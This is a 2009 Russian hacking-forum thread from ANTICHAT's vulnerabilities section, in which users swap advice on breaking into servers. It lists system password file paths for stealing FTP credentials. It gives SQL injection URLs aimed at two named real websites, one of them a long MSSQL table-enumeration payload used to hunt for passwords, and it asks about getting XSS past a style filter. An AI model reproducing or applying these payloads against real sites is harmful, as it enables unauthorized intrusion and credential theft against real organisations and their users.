HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 04.02.2009, 06:19
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами: 9326973

Репутация: -25
По умолчанию

Вот конфигурация сервера:
Apache/2.0.59 (Unix) DAV/2 PHP/5.0.4 mod_ssl/2.0.59 OpenSSL/0.9.8h Sun-ONE-ASP/4.0.2

Вопрос:
Где лежит файл с кодами от ftp???
 
Ответить с цитированием

  #2  
Старый 04.02.2009, 06:29
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами: 9454841

Репутация: 504


По умолчанию

Цитата:
Сообщение от geforce  
Вот конфигурация сервера:
Apache/2.0.59 (Unix) DAV/2 PHP/5.0.4 mod_ssl/2.0.59 OpenSSL/0.9.8h Sun-ONE-ASP/4.0.2
Вопрос:
Где лежит файл с кодами от ftp???
а ftp-сервер там какой?
 
Ответить с цитированием

  #3  
Старый 04.02.2009, 12:38
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами: 10339586

Репутация: 1396


По умолчанию

/etc/shadow
/etc/master.passwd
/etc/system/passwd
/etc/security/passwd
мб еще в БД лежат.
зависит не только от версии апача и пхп и прикруток, а от ОС и, как заметил gisTy - фтп сервера(хотя, скорее всего, пох на фтп-демона =) )
 
Ответить с цитированием

  #4  
Старый 04.02.2009, 15:50
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами: 9999746

Репутация: 1318


По умолчанию

Если прав на чтение той базы у текущего юзера нету, то никак ты не прочитаешь данные из той базы...
 
Ответить с цитированием

  #5  
Старый 04.02.2009, 15:50
IIAPTUZAH
Познающий
Регистрация: 15.11.2008
Сообщений: 32
С нами: 9203303

Репутация: 22
По умолчанию

Нашол вот чё: http://www.bnti.ru/index.asp?tbl=1' OR  '1'='1%27
Что от сюда полезное???
 
Ответить с цитированием

  #6  
Старый 04.02.2009, 16:15
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию

Цитата:
Сообщение от IIAPTUZAH  
Нашол вот чё: http://www.bnti.ru/index.asp?tbl=1' OR  '1'='1%27
Что от сюда полезное???
А что ты тут нашел? o_0
 
Ответить с цитированием

  #7  
Старый 04.02.2009, 16:27
IIAPTUZAH
Познающий
Регистрация: 15.11.2008
Сообщений: 32
С нами: 9203303

Репутация: 22
По умолчанию

Блин как так 2 раз незаходит Лан хоть скрин есть Он выдал мне на страницу инфы ....
 
Ответить с цитированием

  #8  
Старый 04.02.2009, 16:35
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Цитата:
А что ты тут нашел? o_0
Если разэнкодить символы 1' OR '1&# x27;='1%27 будет
Цитата:
1' OR '1'='1'
 
Ответить с цитированием

  #9  
Старый 04.02.2009, 16:42
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами: 9567480

Репутация: 61
По умолчанию

Вопрос по XSS

Возсожно ли организовать уязвимость в поле color: у style ?
Фильтр " не пропускает, а если сделать так \"\ то получается такое
PHP код:
<span style="color:\&quot">1</span
 
Ответить с цитированием

  #10  
Старый 04.02.2009, 20:43
IIAPTUZAH
Познающий
Регистрация: 15.11.2008
Сообщений: 32
С нами: 9203303

Репутация: 22
По умолчанию

Всем здрастье Вот перебрал всю таблицу а пасы ненашол
http://ts.edu.ru/schools/region/6/?town=%27+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFOR MATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(%27% 20DBSchool%27,%27school_Need%27,%27school_News%27, %27school_Photo%27,%27school_Teachers%27,%27School _Leavers%27,%27index_Epigraph%27,%27index_bgImage% 27,%27site_news%27,%27SchoolTypes%27,%27blag_News% 27,%27SchoolForms%27,%27vote_Main%27,%27SchoolVids %27,%27v_FullSchoolInfo%27,%27vote_Answers%27,%27R egions%27,%27TownTypes%27,%27school_Main%27,%27%D0 %E0%F1%EF%F0%E5%E4%E5%EB%E5%ED%E8%E5%20%F8%EA%EE%E B%20%EF%EE%20%F0%E5%E3%E8%EE%ED%E0%EC%27,%27Images %27,%27tmpImages%27,%27HelpTypes%27,%27Forums%27,% 27school_History%27,%27sponsor_offers%27,%27Countr ies%27,%27Educations%27,%27Users%27,%27syssegments %27,%27sysconstraints%27,%27Admin_schools%27,%27dt properties%27,%27Admin_Site%27,%27v_School_Need_Fu ll%27,%27v_Sponsor_Offers_Full%27))--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.